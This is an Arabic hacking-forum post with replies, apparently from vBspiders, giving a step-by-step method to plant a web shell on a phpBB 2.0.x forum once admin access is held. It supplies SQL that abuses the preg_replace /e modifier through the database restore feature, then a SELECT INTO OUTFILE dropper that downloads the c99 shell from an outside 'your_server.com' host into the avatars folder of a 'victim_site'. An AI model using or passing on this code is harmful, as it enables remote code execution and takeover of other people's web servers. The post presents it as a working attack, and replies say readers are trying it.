حصري [ رفع الشيل عن طريق PHPBB admin ]

[megainfo]

السلام عليكم ورحمه الله وبركاته

مجرب على : PHPBB 2.0.19 , 2.0.23

إذا كان لديك ادمين فروم PHPBB ولم تستطع رفع الشيل ، إذا ألحل هنا وحصريا ...

1. تدخل على administration پانل
2. حرر ملف جديد في جهازك shell.sql وضع هذا آلكود sql

كود:

UPDATE users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo();' WHERE user_id=YOUR_ID;

YOUR_ID هو ID بتاعك في فروم ، تقدر تستعمل 2 إلي هو تاع admin forum

3.إذهب الى Restore Database و اعمل upload للملف shell.sql

4. إذهب الى EDIT account في forum و ليس administration پانل

Wow

يمكنك رؤية phpinfo تعمل ....

يمكنك الآن كتآبة اي كودPHP آخر لوووووووووووول

هذا آلكود لرفع الشيل :

كود:

#
# Table Data for phpbb_categories
#

SELECT '<?php $l=fopen("/home/local/httpd/virtual/victim_site/htdocs/forum/images/avatars/shell.php","a+") or die("Could not open file!"); fwrite($l,file_get_*******s("http://www.your_server.com/c99.php.txt"));fclose($l); ?>' INTO OUTFILE '/home/local/httpd/virtual/site_victime/htdocs/forum/images/avatars/uploder_shell.php';

http://www.your_server.com/c99.php.txt


بعد upload، تفتح الصفحة :
http://www.vicitm_site.com/forum/ima...oder_shell.php


بعدها، الصفحة shell.php تتكون دآخل آلمجلد avatars

يمكنك تغيير المسار :
/home/local/httpd/virtual/victim_site/htdocs/forum/images/avatars/shell.php

على حسب السيرفر


إفتح الصفحة لتشغيل الشيل --->

http://www.vicitm_site.com/forum/ima...tars/shell.php

وسلام

المصدر: :: vBspiders Professional Network ::

---

pwvd F vtu hgadg uk 'vdr PHPBB admin D

مشكور , ,تابع

[KaLa$nikoV]

يا مبدع

انت :a04:

اقبل مروري

[THE WARRIOR]

مشكور جارى تجريبة الطريقة

[megainfo]

شكراعلى المرور ....